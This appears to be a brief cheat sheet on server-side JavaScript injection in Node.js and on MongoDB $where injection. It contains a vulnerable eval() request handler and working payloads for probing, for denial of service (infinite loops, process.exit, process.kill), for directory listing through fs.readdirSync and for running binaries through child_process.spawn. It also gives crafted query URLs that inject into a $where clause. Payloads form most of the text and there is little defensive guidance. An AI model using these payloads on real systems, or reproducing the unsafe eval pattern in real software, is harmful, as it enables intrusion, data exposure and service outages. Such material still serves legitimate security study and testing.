Server-Side JavaScript Injection

Sample Code:

var http = require('http');
http.createServer(function(request, response) {
    if (request.method === 'POST') {
        var data = '';
        request.addListener('data', function(chunk) {
            data += chunk;
        });
        request.addListener('end', function() {
            // Vulnerable: eval() runs the request body as JavaScript instead of parsing it as data
            var stockQuery = eval("(" + data + ")");
            getStockPrice(stockQuery.symbol); // …
        });
    }
}).listen(8080); // port assumed; the original listing is truncated here

Payload:

response.end('success')

The server code would then execute this injected command and return the text “success” as the body of the HTTP response. If an attacker sends this probing request and receives “success” as the response, he knows that the server will execute his arbitrarily supplied JavaScript, and he can proceed to send some more damaging attacks.

Denial of Service

Payload:

// Payload 1
while(1)

// Payload 2
process.exit()

// Payload 3
process.kill(process.pid)

File System Access

Sample Code:

var fs = require('fs');

Payload:

response.end(require('fs').readdirSync('.').toString())

response.end(require('fs').readdirSync('..').toString())

Execution of Binary Files

require('child_process').spawn(filename);

SQLi (MongoDB $where clause injection)

Sample:

$query = 'function() {var search_year = \'' .
        $_GET['year'] . '\';' .
        'return this.publicationYear == search_year || ' .
        ' this.filmingYear == search_year || ' .
        ' this.recordingYear == search_year;}';

$cursor = $collection->find(array('$where' => $query));

Payload:

http://server/app.php?year=1995';while(1);var%20foo='bar
http://server/app.php?year=1995';return(true);var%20foo='bar
http://server/app.php?year=1995';return(false);var%20foo='bar

Ref

Paper
